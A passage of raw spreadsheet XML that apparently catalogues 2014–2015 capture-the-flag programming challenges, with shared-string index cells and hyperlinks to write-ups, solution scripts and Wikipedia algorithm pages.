      <c r="H84" s="70" t="s">
        <v>300</v>
      </c>
      <c r="I84" s="29"/>
      <c r="J84" s="29"/>
      <c r="K84" s="29"/>
      <c r="L84" s="29"/>
      <c r="M84" s="29"/>
      <c r="N84" s="29"/>
      <c r="O84" s="29"/>
      <c r="P84" s="29"/>
      <c r="Q84" s="29"/>
      <c r="R84" s="29"/>
      <c r="S84" s="29"/>
      <c r="T84" s="29"/>
      <c r="U84" s="29"/>
      <c r="V84" s="29"/>
      <c r="W84" s="29"/>
      <c r="X84" s="29"/>
      <c r="Y84" s="29"/>
      <c r="Z84" s="29"/>
      <c r="AA84" s="29"/>
      <c r="AB84" s="29"/>
    </row>
    <row r="85">
      <c r="A85" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B85" s="71">
        <v>2015.0</v>
      </c>
      <c r="C85" s="70" t="s">
        <v>3998</v>
      </c>
      <c r="D85" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E85" s="70" t="s">
        <v>3999</v>
      </c>
      <c r="F85" s="70" t="s">
        <v>682</v>
      </c>
      <c r="G85" s="72"/>
      <c r="H85" s="70" t="s">
        <v>300</v>
      </c>
      <c r="I85" s="29"/>
      <c r="J85" s="29"/>
      <c r="K85" s="29"/>
      <c r="L85" s="29"/>
      <c r="M85" s="29"/>
      <c r="N85" s="29"/>
      <c r="O85" s="29"/>
      <c r="P85" s="29"/>
      <c r="Q85" s="29"/>
      <c r="R85" s="29"/>
      <c r="S85" s="29"/>
      <c r="T85" s="29"/>
      <c r="U85" s="29"/>
      <c r="V85" s="29"/>
      <c r="W85" s="29"/>
      <c r="X85" s="29"/>
      <c r="Y85" s="29"/>
      <c r="Z85" s="29"/>
      <c r="AA85" s="29"/>
      <c r="AB85" s="29"/>
    </row>
    <row r="86">
      <c r="A86" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B86" s="71">
        <v>2015.0</v>
      </c>
      <c r="C86" s="70" t="s">
        <v>4003</v>
      </c>
      <c r="D86" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E86" s="70" t="s">
        <v>3999</v>
      </c>
      <c r="F86" s="70" t="s">
        <v>682</v>
      </c>
      <c r="G86" s="72"/>
      <c r="H86" s="70" t="s">
        <v>300</v>
      </c>
      <c r="I86" s="29"/>
      <c r="J86" s="29"/>
      <c r="K86" s="29"/>
      <c r="L86" s="29"/>
      <c r="M86" s="29"/>
      <c r="N86" s="29"/>
      <c r="O86" s="29"/>
      <c r="P86" s="29"/>
      <c r="Q86" s="29"/>
      <c r="R86" s="29"/>
      <c r="S86" s="29"/>
      <c r="T86" s="29"/>
      <c r="U86" s="29"/>
      <c r="V86" s="29"/>
      <c r="W86" s="29"/>
      <c r="X86" s="29"/>
      <c r="Y86" s="29"/>
      <c r="Z86" s="29"/>
      <c r="AA86" s="29"/>
      <c r="AB86" s="29"/>
    </row>
    <row r="87">
      <c r="A87" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B87" s="71">
        <v>2015.0</v>
      </c>
      <c r="C87" s="70" t="s">
        <v>4007</v>
      </c>
      <c r="D87" s="70" t="s">
        <v>128</v>
      </c>
      <c r="E87" s="70" t="s">
        <v>4008</v>
      </c>
      <c r="F87" s="70" t="s">
        <v>4009</v>
      </c>
      <c r="G87" s="72"/>
      <c r="H87" s="70" t="s">
        <v>300</v>
      </c>
      <c r="I87" s="29"/>
      <c r="J87" s="29"/>
      <c r="K87" s="29"/>
      <c r="L87" s="29"/>
      <c r="M87" s="29"/>
      <c r="N87" s="29"/>
      <c r="O87" s="29"/>
      <c r="P87" s="29"/>
      <c r="Q87" s="29"/>
      <c r="R87" s="29"/>
      <c r="S87" s="29"/>
      <c r="T87" s="29"/>
      <c r="U87" s="29"/>
      <c r="V87" s="29"/>
      <c r="W87" s="29"/>
      <c r="X87" s="29"/>
      <c r="Y87" s="29"/>
      <c r="Z87" s="29"/>
      <c r="AA87" s="29"/>
      <c r="AB87" s="29"/>
    </row>
    <row r="88">
      <c r="A88" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B88" s="24">
        <v>2015.0</v>
      </c>
      <c r="C88" s="23" t="s">
        <v>4012</v>
      </c>
      <c r="D88" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E88" s="23" t="s">
        <v>4013</v>
      </c>
      <c r="F88" s="23" t="s">
        <v>4015</v>
      </c>
      <c r="J88" s="29"/>
      <c r="K88" s="29"/>
      <c r="L88" s="29"/>
      <c r="M88" s="29"/>
      <c r="N88" s="29"/>
      <c r="O88" s="29"/>
      <c r="P88" s="29"/>
      <c r="Q88" s="29"/>
      <c r="R88" s="29"/>
      <c r="S88" s="29"/>
      <c r="T88" s="29"/>
      <c r="U88" s="29"/>
      <c r="V88" s="29"/>
      <c r="W88" s="29"/>
      <c r="X88" s="29"/>
      <c r="Y88" s="29"/>
      <c r="Z88" s="29"/>
      <c r="AA88" s="29"/>
      <c r="AB88" s="29"/>
    </row>
    <row r="89">
      <c r="A89" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B89" s="24">
        <v>2015.0</v>
      </c>
      <c r="C89" s="23" t="s">
        <v>4021</v>
      </c>
      <c r="D89" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E89" s="23" t="s">
        <v>4022</v>
      </c>
      <c r="F89" s="23" t="s">
        <v>4024</v>
      </c>
      <c r="J89" s="29"/>
      <c r="K89" s="29"/>
      <c r="L89" s="29"/>
      <c r="M89" s="29"/>
      <c r="N89" s="29"/>
      <c r="O89" s="29"/>
      <c r="P89" s="29"/>
      <c r="Q89" s="29"/>
      <c r="R89" s="29"/>
      <c r="S89" s="29"/>
      <c r="T89" s="29"/>
      <c r="U89" s="29"/>
      <c r="V89" s="29"/>
      <c r="W89" s="29"/>
      <c r="X89" s="29"/>
      <c r="Y89" s="29"/>
      <c r="Z89" s="29"/>
      <c r="AA89" s="29"/>
      <c r="AB89" s="29"/>
    </row>
    <row r="90">
      <c r="A90" s="17">
        <v>42552.0</v>
      </c>
      <c r="B90" s="65"/>
      <c r="C90" s="65"/>
      <c r="D90" s="65"/>
      <c r="E90" s="9"/>
      <c r="F90" s="65"/>
      <c r="G90" s="65"/>
      <c r="H90" s="66"/>
      <c r="I90" s="9"/>
      <c r="J90" s="9"/>
      <c r="K90" s="9"/>
      <c r="L90" s="9"/>
      <c r="M90" s="9"/>
      <c r="N90" s="9"/>
      <c r="O90" s="9"/>
      <c r="P90" s="9"/>
      <c r="Q90" s="9"/>
      <c r="R90" s="9"/>
      <c r="S90" s="9"/>
      <c r="T90" s="9"/>
      <c r="U90" s="9"/>
      <c r="V90" s="9"/>
      <c r="W90" s="9"/>
      <c r="X90" s="9"/>
      <c r="Y90" s="9"/>
      <c r="Z90" s="9"/>
    </row>
    <row r="91">
      <c r="A91" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B91" s="43">
        <v>2015.0</v>
      </c>
      <c r="C91" s="5" t="s">
        <v>4032</v>
      </c>
      <c r="D91" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E91" s="5" t="s">
        <v>4033</v>
      </c>
      <c r="F91" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G91" s="3"/>
      <c r="H91" s="5" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B92" s="31">
        <v>2015.0</v>
      </c>
      <c r="C92" s="30" t="s">
        <v>4036</v>
      </c>
      <c r="D92" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E92" s="35" t="s">
        <v>4038</v>
      </c>
      <c r="F92" s="30" t="s">
        <v>4039</v>
      </c>
      <c r="G92" s="30" t="s">
        <v>4040</v>
      </c>
      <c r="H92" s="33" t="str">
        <f>HYPERLINK("https://github.com/p4-team/ctf/blob/master/2015-09-26-trendmicro/captcha/captcha.py","Completed Script")</f>
        <v>Completed Script</v>
      </c>
      <c r="I92" s="30"/>
      <c r="J92" s="30"/>
    </row>
    <row r="93">
      <c r="A93" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B93" s="31">
        <v>2015.0</v>
      </c>
      <c r="C93" s="30" t="s">
        <v>4051</v>
      </c>
      <c r="D93" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E93" s="35" t="s">
        <v>4053</v>
      </c>
      <c r="F93" s="30" t="s">
        <v>4054</v>
      </c>
      <c r="G93" s="30"/>
      <c r="H93" s="33" t="str">
        <f>HYPERLINK("https://b01lers.net/challenges/Trend%20Micro%20Qualifier%202015/Click%20on%20the%20Different%20Color/63/","Code")</f>
        <v>Code</v>
      </c>
      <c r="I93" s="30"/>
      <c r="J93" s="30"/>
    </row>
    <row r="94">
      <c r="A94" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B94" s="31">
        <v>2015.0</v>
      </c>
      <c r="C94" s="30" t="s">
        <v>4066</v>
      </c>
      <c r="D94" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E94" s="35" t="s">
        <v>4067</v>
      </c>
      <c r="F94" s="30" t="s">
        <v>4068</v>
      </c>
      <c r="G94" s="30"/>
      <c r="H94" s="30"/>
      <c r="I94" s="30"/>
      <c r="J94" s="30"/>
    </row>
    <row r="95">
      <c r="A95" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B95" s="31">
        <v>2015.0</v>
      </c>
      <c r="C95" s="30" t="s">
        <v>4069</v>
      </c>
      <c r="D95" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E95" s="35" t="s">
        <v>4070</v>
      </c>
      <c r="F95" s="30" t="s">
        <v>4072</v>
      </c>
      <c r="G95" s="30"/>
      <c r="H95" s="30"/>
      <c r="I95" s="30"/>
      <c r="J95" s="30"/>
    </row>
    <row r="96">
      <c r="A96" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B96" s="31">
        <v>2015.0</v>
      </c>
      <c r="C96" s="30" t="s">
        <v>4074</v>
      </c>
      <c r="D96" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E96" s="35" t="s">
        <v>4077</v>
      </c>
      <c r="F96" s="30" t="s">
        <v>4079</v>
      </c>
      <c r="G96" s="30"/>
      <c r="H96" s="30"/>
      <c r="I96" s="30"/>
      <c r="J96" s="30"/>
    </row>
    <row r="97">
      <c r="A97" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B97" s="31">
        <v>2015.0</v>
      </c>
      <c r="C97" s="30" t="s">
        <v>4080</v>
      </c>
      <c r="D97" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E97" s="35" t="s">
        <v>4082</v>
      </c>
      <c r="F97" s="30" t="s">
        <v>4084</v>
      </c>
      <c r="G97" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Convex_hull","Convex Hull")</f>
        <v>Convex Hull</v>
      </c>
      <c r="H97" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Graham_scan","Graham Scan")</f>
        <v>Graham Scan</v>
      </c>
      <c r="I97" s="33" t="str">
        <f>HYPERLINK("http://scipy.github.io/devdocs/generated/scipy.spatial.ConvexHull.html","Convex Hull Py Library")</f>
        <v>Convex Hull Py Library</v>
      </c>
      <c r="J97" s="30"/>
    </row>
    <row r="98">
      <c r="A98" s="17">
        <v>42570.0</v>
      </c>
      <c r="B98" s="65"/>
      <c r="C98" s="65"/>
      <c r="D98" s="65"/>
      <c r="E98" s="9"/>
      <c r="F98" s="65"/>
      <c r="G98" s="65"/>
      <c r="H98" s="66"/>
      <c r="I98" s="9"/>
      <c r="J98" s="9"/>
      <c r="K98" s="9"/>
      <c r="L98" s="9"/>
      <c r="M98" s="9"/>
      <c r="N98" s="9"/>
      <c r="O98" s="9"/>
      <c r="P98" s="9"/>
      <c r="Q98" s="9"/>
      <c r="R98" s="9"/>
      <c r="S98" s="9"/>
      <c r="T98" s="9"/>
      <c r="U98" s="9"/>
      <c r="V98" s="9"/>
      <c r="W98" s="9"/>
      <c r="X98" s="9"/>
      <c r="Y98" s="9"/>
      <c r="Z98" s="9"/>
    </row>
    <row r="99">
      <c r="A99" s="30" t="s">
        <v>1216</v>
      </c>
      <c r="B99" s="31">
        <v>2015.0</v>
      </c>
      <c r="C99" s="30" t="s">
        <v>4102</v>
      </c>
      <c r="D99" s="30" t="s">
        <v>573</v>
      </c>
      <c r="E99" s="30" t="s">
        <v>4103</v>
      </c>
      <c r="F99" s="35" t="s">
        <v>1993</v>
      </c>
      <c r="G99" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B100" s="31">
        <v>2015.0</v>
      </c>
      <c r="C100" s="30" t="s">
        <v>4105</v>
      </c>
      <c r="D100" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E100" s="30" t="s">
        <v>4106</v>
      </c>
      <c r="F100" s="30" t="s">
        <v>4108</v>
      </c>
      <c r="G100" s="30"/>
      <c r="H100" s="30"/>
      <c r="I100" s="30"/>
    </row>
    <row r="101">
      <c r="A101" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B101" s="31">
        <v>2015.0</v>
      </c>
      <c r="C101" s="30" t="s">
        <v>4111</v>
      </c>
      <c r="D101" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E101" s="30" t="s">
        <v>4113</v>
      </c>
      <c r="F101" s="30" t="s">
        <v>4115</v>
      </c>
      <c r="G101" s="30"/>
      <c r="H101" s="30"/>
      <c r="I101" s="30"/>
    </row>
    <row r="102">
      <c r="A102" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B102" s="31">
        <v>2015.0</v>
      </c>
      <c r="C102" s="30" t="s">
        <v>4120</v>
      </c>
      <c r="D102" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E102" s="30" t="s">
        <v>4122</v>
      </c>
      <c r="F102" s="30" t="s">
        <v>4124</v>
      </c>
      <c r="G102" s="30"/>
      <c r="H102" s="30"/>
      <c r="I102" s="30"/>
    </row>
    <row r="103">
      <c r="A103" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B103" s="43">
        <v>2015.0</v>
      </c>
      <c r="C103" s="5" t="s">
        <v>4125</v>
      </c>
      <c r="D103" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E103" s="5" t="s">
        <v>4127</v>
      </c>
      <c r="F103" s="5" t="s">
        <v>4128</v>
      </c>
      <c r="G103" s="5" t="s">
        <v>2490</v>
      </c>
      <c r="H103" s="5" t="s">
        <v>2486</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B104" s="43">
        <v>2015.0</v>
      </c>
      <c r="C104" s="5" t="s">
        <v>4131</v>
      </c>
      <c r="D104" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E104" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="F104" s="5" t="s">
        <v>4133</v>
      </c>
      <c r="G104" s="3"/>
      <c r="H104" s="5" t="s">
        <v>4134</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B105" s="31">
        <v>2015.0</v>
      </c>
      <c r="C105" s="30" t="s">
        <v>4136</v>
      </c>
      <c r="D105" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E105" s="30" t="s">
        <v>4137</v>
      </c>
      <c r="F105" s="30" t="s">
        <v>682</v>
      </c>
      <c r="G105" s="30"/>
    </row>
    <row r="106">
      <c r="A106" s="17">
        <v>42577.0</v>
      </c>
      <c r="B106" s="65"/>
      <c r="C106" s="65"/>
      <c r="D106" s="65"/>
      <c r="E106" s="9"/>
      <c r="F106" s="65"/>
      <c r="G106" s="65"/>
      <c r="H106" s="66"/>
      <c r="I106" s="9"/>
      <c r="J106" s="9"/>
      <c r="K106" s="9"/>
      <c r="L106" s="9"/>
      <c r="M106" s="9"/>
      <c r="N106" s="9"/>
      <c r="O106" s="9"/>
      <c r="P106" s="9"/>
      <c r="Q106" s="9"/>
      <c r="R106" s="9"/>
      <c r="S106" s="9"/>
      <c r="T106" s="9"/>
      <c r="U106" s="9"/>
      <c r="V106" s="9"/>
      <c r="W106" s="9"/>
      <c r="X106" s="9"/>
      <c r="Y106" s="9"/>
      <c r="Z106" s="9"/>
    </row>
    <row r="107">
      <c r="A107" s="184" t="s">
        <v>1473</v>
      </c>
      <c r="B107" s="185">
        <v>2015.0</v>
      </c>
      <c r="C107" s="184" t="s">
        <v>4142</v>
      </c>
      <c r="D107" s="184" t="s">
        <v>3617</v>
      </c>
      <c r="E107" s="186" t="s">
        <v>4143</v>
      </c>
      <c r="F107" s="184" t="s">
        <v>4144</v>
      </c>
      <c r="G107" s="187" t="str">
        <f>HYPERLINK("https://github.com/p4-team/ctf/tree/master/2015-10-02-dctf/misc_400_captcha","The Writeup / Script")</f>
        <v>The Writeup / Script</v>
      </c>
      <c r="H107" s="186" t="s">
        <v>4149</v>
      </c>
      <c r="I107" s="184"/>
    </row>
    <row r="108">
      <c r="A108" s="30" t="s">
        <v>3408</v>
      </c>
      <c r="B108" s="31">
        <v>2015.0</v>
      </c>
      <c r="C108" s="30" t="s">
        <v>4150</v>
      </c>
      <c r="D108" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E108" s="35" t="s">
        <v>4151</v>
      </c>
      <c r="F108" s="30" t="s">
        <v>4152</v>
      </c>
      <c r="G108" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H108" s="40" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="184" t="s">
        <v>3408</v>
      </c>
      <c r="B109" s="185">
        <v>2015.0</v>
      </c>
      <c r="C109" s="184" t="s">
        <v>4153</v>
      </c>
      <c r="D109" s="184" t="s">
        <v>128</v>
      </c>
      <c r="E109" s="184" t="s">
        <v>300</v>
      </c>
      <c r="F109" s="184" t="s">
        <v>4154</v>
      </c>
      <c r="G109" s="187" t="str">
        <f>HYPERLINK("https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/DEFCONCTF/coding/catwestern/solution/catwestern_solution.py","solution scipt")</f>
        <v>solution scipt</v>
      </c>
      <c r="H109" s="184" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B110" s="31">
        <v>2015.0</v>
      </c>
      <c r="C110" s="30" t="s">
        <v>4155</v>
      </c>
      <c r="D110" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E110" s="35" t="s">
        <v>4156</v>
      </c>
      <c r="F110" s="30" t="s">
        <v>4157</v>
      </c>
      <c r="G110" s="33" t="str">
        <f>HYPERLINK("https://www.whitehatters.academy/legitbs-2015-blackbox/","Writeup")</f>
        <v>Writeup</v>
      </c>
      <c r="H110" s="186" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="30" t="s">
        <v>4164</v>
      </c>
      <c r="B111" s="31">
        <v>2015.0</v>
      </c>
      <c r="C111" s="30" t="s">
        <v>4166</v>
      </c>
      <c r="D111" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E111" s="35" t="s">
        <v>1263</v>
      </c>
      <c r="F111" s="30" t="s">
        <v>4167</v>
      </c>
      <c r="G111" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Linear_congruential_generator","Linear_congruential_generator")</f>
        <v>Linear_congruential_generator</v>
      </c>
      <c r="H111" s="30" t="s">
        <v>300</v>
      </c>
      <c r="I111" s="30"/>
    </row>
    <row r="112">
      <c r="A112" s="30" t="s">
        <v>4164</v>
      </c>
      <c r="B112" s="31">
        <v>2015.0</v>
      </c>
      <c r="C112" s="30" t="s">
        <v>4172</v>
      </c>
      <c r="D112" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E112" s="35" t="s">
        <v>4173</v>
      </c>
      <c r="F112" s="30" t="s">
        <v>4174</v>
      </c>
      <c r="G112" s="33" t="str">
        <f>HYPERLINK("https://github.com/RandomsCTF/write-ups/tree/master/Hack.lu%20CTF%202015/Perl%20Golf%20%5Bppc%5D%20(75)","writeup / script")</f>
        <v>writeup / script</v>
      </c>
      <c r="H112" s="30" t="s">
        <v>96</v>
      </c>
      <c r="I112" s="30"/>
    </row>
    <row r="113">
      <c r="A113" s="30" t="s">
        <v>4164</v>
      </c>
      <c r="B113" s="31">
        <v>2015.0</v>
      </c>
      <c r="C113" s="30" t="s">
        <v>4181</v>
      </c>
      <c r="D113" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E113" s="35" t="s">
        <v>4173</v>
      </c>
      <c r="F113" s="30" t="s">
        <v>4182</v>
      </c>
      <c r="G113" s="33" t="str">
        <f>HYPERLINK("https://github.com/RandomsCTF/write-ups/tree/master/Hack.lu%20CTF%202015/PHP%20Golf%20%5Bppc%5D%20(75)","writeup / script")</f>
        <v>writeup / script</v>
      </c>
      <c r="H113" s="30" t="s">
        <v>25</v>
      </c>
      <c r="I113" s="30"/>
    </row>
    <row r="114">
      <c r="A114" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B114" s="31">
        <v>2015.0</v>
      </c>
      <c r="C114" s="30" t="s">
        <v>4184</v>
      </c>
      <c r="D114" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E114" s="35" t="s">
        <v>4185</v>
      </c>
      <c r="F114" s="191" t="s">
        <v>4186</v>
      </c>
      <c r="G114" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Quine_(computing)","Quine Problems")</f>
        <v>Quine Problems</v>
      </c>
      <c r="H114" s="30" t="s">
        <v>4198</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="193" t="s">
        <v>1665</v>
      </c>
      <c r="B115" s="195">
        <v>2015.0</v>
      </c>
      <c r="C115" s="193" t="s">
        <v>4206</v>
      </c>
      <c r="D115" s="193" t="s">
        <v>48</v>
      </c>
      <c r="E115" s="196" t="s">
        <v>4209</v>
      </c>
      <c r="F115" s="193" t="s">
        <v>4214</v>
      </c>
      <c r="G115" s="197" t="str">
        <f>HYPERLINK("http://stackoverflow.com/questions/12127833/patterns-possible-on-3x3-matrix-of-numbers","# patterns possible on a 3x3 screen")</f>
        <v># patterns possible on a 3x3 screen</v>
      </c>
      <c r="H115" s="197" t="str">
        <f>HYPERLINK("http://dakutenpura.hatenablog.com/entry/2015/09/07/172118","scripts")</f>
        <v>scripts</v>
      </c>
      <c r="I115" s="30"/>
      <c r="J115" s="193" t="s">
        <v>4149</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B116" s="31">
        <v>2015.0</v>
      </c>
      <c r="C116" s="30" t="s">
        <v>4239</v>
      </c>
      <c r="D116" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E116" s="35" t="s">
        <v>4240</v>
      </c>
      <c r="F116" s="30" t="s">
        <v>4242</v>
      </c>
      <c r="G116" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Blossom_algorithm","Blossom algorithm")</f>
        <v>Blossom algorithm</v>
      </c>
      <c r="H116" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Hopcroft%E2%80%93Karp_algorithm","Hopcroft-Karp algorithm")</f>
        <v>Hopcroft-Karp algorithm</v>
      </c>
      <c r="I116" s="33" t="str">
        <f>HYPERLINK("http://dakutenpura.hatenablog.com/entry/2015/09/07/214418","script")</f>
        <v>script</v>
      </c>
      <c r="J116" s="30" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B117" s="31">
        <v>2015.0</v>
      </c>
      <c r="C117" s="30" t="s">
        <v>4250</v>
      </c>
      <c r="D117" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E117" s="30" t="s">
        <v>4252</v>
      </c>
      <c r="F117" s="35" t="s">
        <v>4253</v>
      </c>
      <c r="G117" s="30" t="s">
        <v>4255</v>
      </c>
      <c r="H117" s="30" t="s">
        <v>4256</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="8">
    <mergeCell ref="G23:H23"/>
    <mergeCell ref="G24:H24"/>
    <mergeCell ref="G35:H35"/>
    <mergeCell ref="F36:J36"/>
    <mergeCell ref="F74:H74"/>
    <mergeCell ref="F75:I75"/>
    <mergeCell ref="F88:I88"/>
    <mergeCell ref="F89:I89"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="G9"/>
    <hyperlink r:id="rId2" ref="H17"/>
    <hyperlink r:id="rId3" ref="G30"/>
    <hyperlink r:id="rId4" ref="G52"/>
    <hyperlink r:id="rId5" ref="G58"/>
    <hyperlink r:id="rId6" ref="H92"/>
    <hyperlink r:id="rId7" ref="H93"/>
    <hyperlink r:id="rId8" ref="G97"/>
    <hyperlink r:id="rId9" ref="H97"/>
    <hyperlink r:id="rId10" ref="I97"/>
    <hyperlink r:id="rId11" ref="G107"/>
    <hyperlink r:id="rId12" ref="G109"/>
    <hyperlink r:id="rId13" ref="G110"/>
    <hyperlink r:id="rId14" ref="G111"/>
    <hyperlink r:id="rId15" ref="G112"/>
    <hyperlink r:id="rId16" ref="G113"/>
    <hyperlink r:id="rId17" ref="G114"/>
    <hyperlink r:id="rId18" ref="G115"/>
    <hyperlink r:id="rId19" ref="H115"/>
    <hyperlink r:id="rId20" ref="G116"/>
    <hyperlink r:id="rId21" ref="H116"/>
    <hyperlink r:id="rId22" ref="I116"/>
  </hyperlinks>
  <drawing r:id="rId2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6" max="6" width="26.0"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="17">
        <v>42503.0</v>
      </c>
      <c r="B1" s="7"/>
      <c r="C1" s="6"/>
      <c r="D1" s="6"/>
      <c r="E1" s="6"/>
      <c r="F1" s="6"/>
      <c r="G1" s="6"/>
      <c r="H1" s="6"/>
      <c r="I1" s="8"/>
      <c r="J1" s="8"/>
      <c r="K1" s="9"/>
      <c r="L1" s="9"/>
      <c r="M1" s="9"/>
      <c r="N1" s="9"/>
      <c r="O1" s="9"/>
      <c r="P1" s="9"/>
      <c r="Q1" s="9"/>
      <c r="R1" s="9"/>
      <c r="S1" s="9"/>
      <c r="T1" s="9"/>
      <c r="U1" s="9"/>
      <c r="V1" s="9"/>
      <c r="W1" s="9"/>
      <c r="X1" s="9"/>
      <c r="Y1" s="9"/>
      <c r="Z1" s="9"/>
    </row>
    <row r="2">
      <c r="A2" s="188" t="s">
        <v>179</v>
      </c>
      <c r="B2" s="189">
        <v>2014.0</v>
      </c>
      <c r="C2" s="188" t="s">
        <v>2401</v>
      </c>
      <c r="D2" s="188" t="s">
        <v>573</v>
      </c>
      <c r="E2" s="188" t="s">
        <v>116</v>
      </c>
      <c r="F2" s="188" t="s">
        <v>4183</v>
      </c>
      <c r="G2" s="190"/>
      <c r="H2" s="190"/>
      <c r="I2" s="192" t="s">
        <v>251</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="188" t="s">
        <v>205</v>
      </c>
      <c r="B3" s="189">
        <v>2014.0</v>
      </c>
      <c r="C3" s="188" t="s">
        <v>4203</v>
      </c>
      <c r="D3" s="188" t="s">
        <v>573</v>
      </c>
      <c r="E3" s="190"/>
      <c r="F3" s="188" t="s">
        <v>4183</v>
      </c>
      <c r="G3" s="190"/>
      <c r="H3" s="194"/>
      <c r="I3" s="194"/>
    </row>
    <row r="4">
      <c r="A4" s="188" t="s">
        <v>205</v>
      </c>
      <c r="B4" s="189">
        <v>2014.0</v>
      </c>
      <c r="C4" s="188" t="s">
        <v>4204</v>
      </c>
      <c r="D4" s="188" t="s">
        <v>573</v>
      </c>
      <c r="E4" s="190"/>
      <c r="F4" s="188" t="s">
        <v>4183</v>
      </c>
      <c r="G4" s="194"/>
      <c r="H4" s="194"/>
      <c r="I4" s="194"/>
    </row>
    <row r="5">
      <c r="A5" s="188" t="s">
        <v>205</v>
      </c>
      <c r="B5" s="189">
        <v>2014.0</v>
      </c>
      <c r="C5" s="188" t="s">
        <v>4208</v>
      </c>
      <c r="D5" s="188" t="s">
        <v>573</v>
      </c>
      <c r="E5" s="190"/>
      <c r="F5" s="188" t="s">
        <v>4183</v>
      </c>
      <c r="G5" s="194"/>
      <c r="H5" s="194"/>
      <c r="I5" s="194"/>
    </row>
    <row r="6">
      <c r="A6" s="188" t="s">
        <v>205</v>
      </c>
      <c r="B6" s="189">
        <v>2014.0</v>
      </c>
      <c r="C6" s="188" t="s">
        <v>4212</v>
      </c>
      <c r="D6" s="188" t="s">
        <v>573</v>
      </c>
      <c r="E6" s="190"/>
      <c r="F6" s="188" t="s">
        <v>4183</v>
      </c>
      <c r="G6" s="194"/>
      <c r="H6" s="194"/>
      <c r="I6" s="194"/>
    </row>
    <row r="7">
      <c r="A7" s="188" t="s">
        <v>205</v>
      </c>
      <c r="B7" s="189">
        <v>2014.0</v>
      </c>
      <c r="C7" s="188" t="s">
        <v>4213</v>
      </c>
      <c r="D7" s="188" t="s">
        <v>573</v>
      </c>
      <c r="E7" s="190"/>
      <c r="F7" s="188" t="s">
        <v>4183</v>
      </c>
      <c r="G7" s="194"/>
      <c r="H7" s="194"/>
      <c r="I7" s="194"/>
    </row>
    <row r="8">
      <c r="A8" s="188" t="s">
        <v>4215</v>
      </c>
      <c r="B8" s="189">
        <v>2014.0</v>
      </c>
      <c r="C8" s="188" t="s">
        <v>4217</v>
      </c>
      <c r="D8" s="190"/>
      <c r="E8" s="190"/>
      <c r="F8" s="188" t="s">
        <v>4218</v>
      </c>
      <c r="G8" s="3"/>
      <c r="H8" s="3"/>
      <c r="I8" s="3"/>
    </row>
    <row r="9">
      <c r="A9" s="188" t="s">
        <v>4215</v>
      </c>
      <c r="B9" s="189">
        <v>2014.0</v>
      </c>
      <c r="C9" s="188" t="s">
